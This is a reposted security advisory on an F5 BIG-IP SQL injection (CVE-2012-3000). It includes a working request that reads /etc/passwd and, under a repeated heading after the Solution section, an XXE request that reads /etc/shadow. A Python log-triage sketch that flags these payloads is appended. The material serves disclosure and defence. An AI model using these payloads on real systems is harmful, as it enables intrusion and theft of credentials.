F5 BUGS
Source: Internet  Published: new ConoHa Windows  Editor: 程序博客网  Time: 2024/04/27 15:09
SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
=======================================================================
title: SQL Injection
product: F5 BIG-IP
vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-3000
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."
URL: http://www.f5.com/products/big-ip/
Vulnerability overview/description:
-----------------------------------
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).
Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.
Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x"
}
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.
Vendor contact timeline:
------------------------
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.
Workaround:
-----------
No workaround available.
Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
...
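
Added example (not part of the SEC Consult advisory and not F5 code): a Python log-triage sketch that flags POST requests to the two endpoints shown above when the body carries SQL syntax in a JSON string or a DTD/entity declaration. The record layout, the finding labels and the regex heuristics are assumptions made for illustration; only the two paths come from the requests in the text.

```python
import json
import re

# Endpoints taken from the two requests shown in the advisory text.
SQLI_PATH = "/sam/admin/reports/php/saveSettings.php"
XXE_PATH = "/sam/admin/vpe2/public/php/server.php"

# Heuristic: a quote that is later followed by SQL syntax or a comment marker.
SQL_MARKERS = re.compile(r"'.*(\bselect\b|\bload_file\s*\(|--|#|/\*)", re.I | re.S)
# Heuristic: any DTD or entity declaration in a client-supplied message.
DTD_MARKERS = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.I)

def string_values(node):
    """Yield every string nested anywhere in a decoded JSON value."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from string_values(value)
    elif isinstance(node, list):
        for value in node:
            yield from string_values(value)

def classify(method, path, body):
    """Return a finding label for one logged request, or None."""
    path = path.split("?", 1)[0]
    if method.upper() != "POST":
        return None
    if path == SQLI_PATH:
        try:
            doc = json.loads(body)
        except ValueError:
            return "sqli-endpoint-unparseable-body"  # worth a look on its own
        if any(SQL_MARKERS.search(s) for s in string_values(doc)):
            return "sqli-suspected"
    elif path == XXE_PATH and DTD_MARKERS.search(body):
        return "xxe-suspected"
    return None

# Constructed sample records (method, path, body); flagged bodies mirror the PoCs above.
SAMPLES = [
    ("POST", SQLI_PATH, '{"id": 2, "defaultQuery": "Top URLs"}'),
    ("POST", SQLI_PATH, '''{"id": 2, "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x"}'''),
    ("POST", XXE_PATH, "<message><dialogueType>any</dialogueType></message>"),
    ("POST", XXE_PATH, "<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]><message><dialogueType>&e;</dialogueType></message>"),
]

if __name__ == "__main__":
    for record in SAMPLES:
        print(classify(*record), record[1])
```

These patterns are triage heuristics for reviewing captured traffic on unpatched systems and can produce false positives on quoted free text; the remedy stated in the advisory remains the update to 11.2.0 HF3 or 11.2.1 HF3.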